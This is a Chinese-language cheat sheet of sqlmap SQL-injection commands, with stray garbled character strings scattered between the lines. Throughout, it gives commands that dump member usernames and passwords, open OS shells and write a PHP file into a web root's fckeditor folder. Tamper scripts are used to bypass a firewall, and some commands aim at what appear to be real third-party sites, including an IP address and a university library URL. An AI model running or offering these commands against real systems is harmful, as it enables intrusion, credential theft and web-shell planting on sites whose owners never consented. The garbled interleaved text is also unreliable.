sqlmap使用实例

admin

/pentest/database/sqlmap
* k1 l7 G: T6 a
update :::::>     in the folder   after  execute    following   order : svn update
) \% K  D& L9 _# Y1 r/ Q  v
. z9 I: g7 ^" c) lsqlmap.py -r 1.txt --current-db
' l0 C8 s" `# ~0 D" a) H
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”

==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
8 I5 X; d, z( n9 W% r猜解数据库
* O. b7 V5 }3 m* y./sqlmap.py -u "injection-url" --dbs
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"

; M& }. ~3 i, ?+ f* q5 P2 q, T猜解表名
0 p: i$ Y% Z5 B6 @8 o./sqlmap.py -u "injection-url" -D database_name --tables
) g1 T- G( Z& u0 a# D. E, Y6 w
: c  H5 L4 ?, q8 P: Usqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
0 E% g2 d: w( k. J; s5 R/ a# l1 G
% W. S6 u8 J7 t# Y$ Lsqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump

sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
5 r7 j0 ^+ _7 B2 nsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
  x. Y8 X- W3 Y" A6 d( ?7 z% r* w, J
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
+ `1 U- J8 A% ^* \2 j1 w7 ~sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
, x- B: |4 k( i& b5 msqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
  z5 f9 W8 ?# P4 u
: Z) B' q: N! Z# r9 D7 i6 t# Nsqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"

% j+ c1 T8 Y9 v  tsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
. ]( }( F# R' u8 e! a* v# k, n, l猜解列名
# h; b) }  A) W; B./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
/ Y9 O, n0 F9 x, b2 i
7 h# f) d* _$ K: l: X0 f( isqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
: m3 z! r! R' E& y! msqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"

sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
&submit=Go
2 z- ~% t0 t/ \" K* Y+ }猜解值
3 g/ e: f* E( d7 ]9 u./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
========================================================
搜索表名中包括mana字符的
6 y2 A1 S( H' x/sqlmap.py -u "injection-url" -T mana --search
返回一个交互式sql shell
/sqlmap.py -u "injection-url" --sql-shell
读取指定文件（需权限）
4 B- W2 j: K. C8 a& J3 B8 k/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
查看当前 用户 及 数据库
/sqlmap.py -u "injection-url" --current-user --current-db
本地文件 写入 远程目标绝对路径
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
( I5 `* O& [/ M+ I3 g2 t
. u# _, _$ Z, J; W7 Zsqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
查看某用的权限
/sqlmap.py -u "injection-url" --privileges -U root
查看当前用户是否为dba
/sqlmap.py -u "injection-url" --is-dba
读取所有数据库用户或指定数据库用户的密码
" o& p% z4 Q9 Wsqlmap.py -r 1.txt --users --passwords
# a; K3 ?( v& h' C; d9 l( Bsqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"

+ M! R  x9 e. O  n+ ]& |6 O/sqlmap.py -u "injection-url" --passwords -U root

--start&&--stop 与 --first&&--last 的区别
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   （--start=1 --stop=2 会列出第二条记录。。。。记录例如：0 1 2 3 ……）
2 L% L; Y) x2 y! y/ B$ G3 u7 c% M
从字典中查找(属于暴利破解)存在的表（sqlmap/txt/common-tables.txt）或字段（sqlmap/txt/common-columns.txt）
4 Y" n) @3 a- l% o$ r% r/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns

执行sql语句，如查询@@datadir得到数据库路径（或者user()/database()等等……）
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
- j5 a! e; X/ p3 E- f% u# N0 \
# |% k9 T+ c% s# a; r: r2 N